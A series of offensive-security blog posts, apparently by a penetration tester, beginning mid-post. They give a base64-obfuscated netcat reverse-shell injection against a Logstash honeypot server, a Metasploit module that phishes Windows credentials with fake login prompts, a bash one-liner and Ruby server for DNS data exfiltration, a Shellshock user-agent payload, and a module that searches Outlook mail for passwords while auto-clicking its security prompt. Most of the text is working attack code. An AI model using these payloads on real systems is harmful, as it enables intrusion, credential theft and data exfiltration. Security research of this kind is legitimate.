We want to run the command ‘nc.traditional 4444 -e /bin/bash’, so we encoded this command into base64:

echo -n 'nc.traditional 10.10.10.10 4444 -e /bin/bash' | base64

This results in the following value:

bmMudHJhZGl0aW9uYWwgMTAuMTAuMTAuMTAgNDQ0NCAtZSAvYmluL2Jhc2g=

We created a oneliner which takes this value, decodes it and runs its output. The command is the following:

'; VAR=bmMudHJhZGl0aW9uYWwgMTAuMTAuMTAuMTAgNDQ0NCAtZSAvYmluL2Jhc2g=; VAR2=$(echo $VAR | base64 -d); $($VAR2);#

Let’s test this, we set up our listener: nc -lvvp 4444 and then ssh into our Kippo honeypot with the user: “root” and password:

'; VAR=bmMudHJhZGl0aW9uYWwgMTAuMTAuMTAuMTAgNDQ0NCAtZSAvYmluL2Jhc2g=; VAR2=$(echo $VAR | base64 -d); $($VAR2);#

Closing the logon session forced kippo to log the data to our ELK server, Logstash passes the input to the commandline injecting our command. We received a reverse root shell.

The following diagram shows the path the attacker took in order to compromise the centralized honeypot server:

Thinking back on it, it was obvious that passing uncontrolled user input to the commandline was a bad idea. The fact that logstash ran with root privileges was a shock. The way we comprised the ELK while using the exec function, is a quite advanced attack which doesn’t seem to be impossible.
We fixed our vulnerability by using another way to pass the input to the Python script. We firstly validate our IP-address using the following grok filter:

filter {
grok {
match => { "attackerIP" => "%{IP:validatedIP}" } add_field => { "valid_ip" => "true" }
match => { "peerIP" => "%{IP:validatedIP}" } add_field => { "valid_ip" => "true" }
match => { "remote_host" => "%{IP:validatedIP}" } add_field => { "valid_ip" => "true" }
  }
}

This prevents the IP to be manipulated with another value.
The message input, which is the most likely to be manupilated, is written to a file by logstash, the filename is passed to the commandline as an static value. This prevents an attacker to manipulate the command in the exec function using the message input.

Windows credentials phishing using Metasploit

2015-02-05T08:40:52+00:00

A while ago i came across a blog post from @enigma0x3. In this blog post a method was described to perform a phishing attack to gather user credentials using Powershell. It is a great way to get the credentials of a user. This attack can be used if privilege escalation is hard (try harder) or not a option. In real life scenario’s i noticed that privilege escalation can be hard, for example on fully patched terminal servers. With this phishing method, you still can get the (network)credentials of the user. These credentials can be used to pivot into the network. I got some ideas to improve the attack:

Built the script into Metasploit, so the script code can be sent through the existing Metasploit connection
Popup the script on a certain user activity (starting new processes), if the popup is appearing without any action, it can be suspicious.
Also some bugfixes were possible in the existing Powershell script

Metasploit post module

I decided to create the Metasploit post module. The Metasploit module has two flavors:

Popup a loginprompt immediately, if the user fills in the credentials, they will be sent back. In order to perform this attack, only the SESSION parameter needs to be set.
Popup a loginprompt when a specific process is started. For example set PROCESS “outlook.exe”, will wait on the user to start outlook. When outlook is started, a loginprompt popups which indicates that outlook.exe needs the user permissions. In the PROCESS option also “*” can be specified, this will use the first starting application as it’s target.

The following module options are available for configuration:

DESCRIPTION: Message shown in the loginprompt
PROCESS: Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)
SESSION: meterpreter session the run the module on

Example

The following example will prompt a loginprompt when the process “calc.exe” is started:

use post/windows/gather/phish_windows_credentials
set PROCESS calc.exe
set SESSION 1
run

The target will see the following loginprompt after starting calc.exe:

When the target filled in it’s user credentials, the following output will appear:

The module is merged into the official Metasploit repository and is available on github:

The ruby script:

https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/phish_windows_credentials.rb

The Powershell script:

https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/Invoke-LoginPrompt.ps1

Happy phishing.

Bash data exfiltration through DNS (using bash builtin functions)

2015-01-19T19:25:47+00:00

After gaining ‘blind’ command execution access to a compromised Linux host, data exfiltration can be difficult when the system is protected by a firewall. Sometimes these firewalls prevent the compromised host to establish connections to the internet. In these cases, data exfiltration through the DNS-protocol can be useful. In a lot of cases DNS-queries are not blocked by a firewall. I’ve had a real life situation like this, which i will describe later on.

There are several oneliners on the internet available to exfiltrate command output through DNS. However, i noticed that these are using Linux applications (xxd, od, hexdump, etc), which are not always present on a minimalistic target system. I decided to create a oneliner, which is only using Bash builtin functionalities. The oneliner can be used whenever command execution is possible and Bash is installed on the compromised system.

I’ve created the following bash command line which can be used on the attacked system to execute commands and send the results through DNS:

(LINE=`id`;domain=yourdomain.com;var=;while IFS= read -r -n 1 char;do var+=$(printf %02X "'${char:-$'\n'}'");done<<<$LINE;e=60;l=${#var};for((b=0;b<l;b+=60))do>&/dev/udp/$RANDOM.$b.${var:$b:$e}.$domain/53 0>&1;done;>&/dev/udp/$RANDOM.theend.$domain/53 0>&1)

In order to use it, first modify the name servers of your domain, point them to the ip-address of the attacker machine. Also two values in the above oneliner need to be changed. The variable “LINE” needs to contain the command to execute, for example “ls -l /”. Also the variable “domain” needs to be modified, replace it with the domain which is pointed to your attacker machine. On the attacker machine, the following server side ruby script (dns.rb) can be started:

#!/usr/bin/ruby

require 'socket'

class UDPServer
  def initialize(port)
    @port = port
  end

  def start
    farray = []
    oarray = []
    @socket = UDPSocket.new
    @socket.bind('', @port)
    cmd = true
    while true
      data , soc = @socket.recvfrom(1024)
      idx = 12
      len = data[idx].ord
      domain = ""
      until len == 0 do
        domain += data[idx + 1, len] + "."
        idx += len + 1
        len = data[idx].ord
      end
      @socket.send(response(data), 0, soc[3], soc[1])
      farray << domain
      if domain.split(".")[-3] == "theend"
          farray.uniq!
          farray.pop
          for i in farray
              oarray << i.split(".")[-3]
          end
          comp = oarray.join()
          output = comp.gsub(/../) { |pair| pair.hex.chr }
          puts output
          farray = []
          oarray = []
      end
    end
  end

  def response(data)
    response = "#{data[0,2]}\x81\x00#{data[4,2] * 2}\x00\x00\x00\x00"
    response += data[12..-1]
    response += "\xc0\x0c\x00\x01\x00\x01"
    response += [60].pack("N")
    rdata = "1.1.1.1".split('.').collect(&:to_i).pack("C*")
    response += [rdata.length].pack("n")
    response += rdata
  end
end

server = UDPServer.new(53)
server.start

The script will retrieve the output of the executed command. The following screenshot shows the command executed on a targeted system:

This screenshot shows the retrieved data by the attacker, using the dns.rb script:

There might be improvements possible to the oneliner and script to make it more efficient. Or there might be some cases where the oneliner doesn’t work. Do not hesitate to comment on this blog if you have an improvement.

Real life scenario

I stumbled on a Dell SonicWALL Secure Remote Access (SRA) appliance which was vulnerable to Shellshock. I discovered this by sending the following user-agent, which returned a 200 HTTP response.

User-agent: () { :; }; /bin/ls

When sending a user-agent with a non-existing binary, it returned a 500 HTTP response, which indicates something went wrong (it cannot execute the defined binary):

User-agent () { :;}; /bin/fake

I was able to execute commands using the Shellshock vulnerability (confirmed by running /bin/sleep 60), however it was not responding with the command output on commands like ‘ls’. I discovered that all outgoing connections to the internet were blocked by the machine, only the DNS protocol was allowed, by resolving a hostname using the telnet executable. The appliance did not have any executables like xxd, hexdump etc. Therefor i decided to create the above line, which is not depending on these utilities, so can be used on any system containing Bash.

Dell is already aware of the Shellshock vulnerability in the older firmware versions of SRA. More details on how to patch the issue can be found at:

https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series

Reading Outlook using Metasploit

2014-12-08T20:47:15+00:00

In penetration tests, it sometimes can be hard to escalate privileges on a (Windows) target system. In this situation it can be useful to gain access to resources with sensitive information, such as passwords.

Metasploit does not have any module to read email messages from a local Outlook installation. Outlook can however contain a lot of sensitive and useful information in a penetration test, such as networkcredentials. I decided to create a Metasploit module which can read and/or search the local Outlook email messages.

How?

In order to do this, the module is using powershell. The following powershell script is used by the Metasploit module:

function GetSubfolders($root) {
  $folders = @()
  $folders += $root
  foreach ($folder in $root.Folders) {
    $folders += GetSubfolders($folder)
  }
  return $folders
}

function List-Folder {
  Clear-host
  Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
  $Outlook = New-Object -ComObject Outlook.Application
  $Namespace = $Outlook.GetNameSpace("MAPI")
  $account = $NameSpace.Folders
  $folders = @()
  foreach ($acc in $account) {
    foreach ($folder in $acc.Folders) {
      $folders += GetSubfolders($folder)
    }
  }
  $folders | FT FolderPath
}

function Get-Emails {
  param ([String]$searchTerm,[String]$Folder)
  Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
  $Outlook = New-Object -ComObject Outlook.Application
  $Namespace = $Outlook.GetNameSpace("MAPI")
  $account = $NameSpace.Folders
  $found = $false
  foreach ($acc in $account) {
    try {
      $Email = $acc.Folders.Item($Folder).Items
      $result = $Email | Where-Object {$_.HTMLBody -like '*' + $searchTerm + '*' -or $_.TaskSubject -like '*' + $searchTerm + '*'}
      if($result) {
        $found = $true
        $result | Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
      }
    } catch {
      Write-Host "Folder" $Folder "not found in mailbox" $acc.Name
    }
  }
  if(-Not $found) {
    Write-Host "Searchterm" $searchTerm "not found"
  }
}

The function ‘List-Folder’ displays all the available mailboxes and associated folders in a local Outlook installation. The function ‘Get-Emails’ is used to display messages in a specified folder, these messages can also be filtered by a keyword (for example ‘password’).

A problem which i stumbled on was a security popup when connecting to Outlook using powershell. The popup looks like this:

It was quite a challenge to bypass this message, because it has to be clicked by the user manually. In the module i used WinAPI in order to accomplish the bypass. Please note, that a user behind the target system, can notice these activities. So keep in mind that they might be able to detect your activities when using this module. The following function is checking the “allow access for” box and clicking the “allow” button.

def clickButton(atrans,acftrans)
    # This functions clicks on the security notification generated by Outlook.

    sleep 1
    hwnd = client.railgun.user32.FindWindowW(nil, "Microsoft Outlook")
    if hwnd != 0
      hwndChildCk = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "&#{acftrans}")
      client.railgun.user32.SendMessageW(hwndChildCk['return'], 0x00F1, 1, nil)
      client.railgun.user32.MoveWindow(hwnd['return'],150,150,1,1,true)
      hwndChild = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "#{atrans}")
      client.railgun.user32.SetActiveWindow(hwndChild['return'])
      client.railgun.user32.SetForegroundWindow(hwndChild['return'])
      client.railgun.user32.SetCursorPos(150,150)
      client.railgun.user32.mouse_event(0x0002,150,150,nil,nil)
      client.railgun.user32.SendMessageW(hwndChild['return'], 0x00F5, 0, nil)
    else
      print_error("Error while clicking on the Outlook security notification. Window could not be found")
    end
  end

Module usage

The module can be installed by updating Metasploit. The module has two ‘ACTIONS’:

LIST: Display the available mailboxes and folders in a local Outlook installation
SEARCH: Display messages in a specified FOLDER, can be filtered by a KEYWORD

The LIST action requires only the options ‘SESSION’ to be set.

In order to use the SEARCH action, the module has several options which can be set. The following options are present in the module:

ACF_TRANSLATION: Fill in the translation of the phrase "Allow access for" in the targets system language, to click on the security popup.
A_TRANSLATION: Fill in the translation of the word "Allow" in the targets system language, to click on the security popup.
FOLDER:The e-mailfolder to read (e.g. Inbox)
KEYWORD: The keyword to search in the emails
LIST_FOLDERS: List folders available in the mailbox
SESSION: Session to run the MSF module on

The options FOLDER (folder to search, e.g. “Inbox”) and KEYWORD (filter on a keyword like “password”) are pretty straightforward.

The options A_TRANSLATION and ACF_TRANSLATION are required to click on Outlooks security notification, when the language is not supported by the module (en-US, NL and DE are supported). Fill in the translation present on the target system of “Allow” into the option “A_TRANSLATION” and “Allow access for” in “ACF_TRANSLATION”.

The following output is a example snippet of output which is generated by the Metasploit module when using the ‘LIST’ action:

The following output is a example snippet of output which is generated by the Metasploit module when using the ‘SEARCH’ action, on the folder ‘Inbox’ with a keyword ‘password’:

I’ve submitted the module to the official master github of Metasploit. The module has been merged, and the code can be found at:
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/outlook.rb
https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/outlook.ps1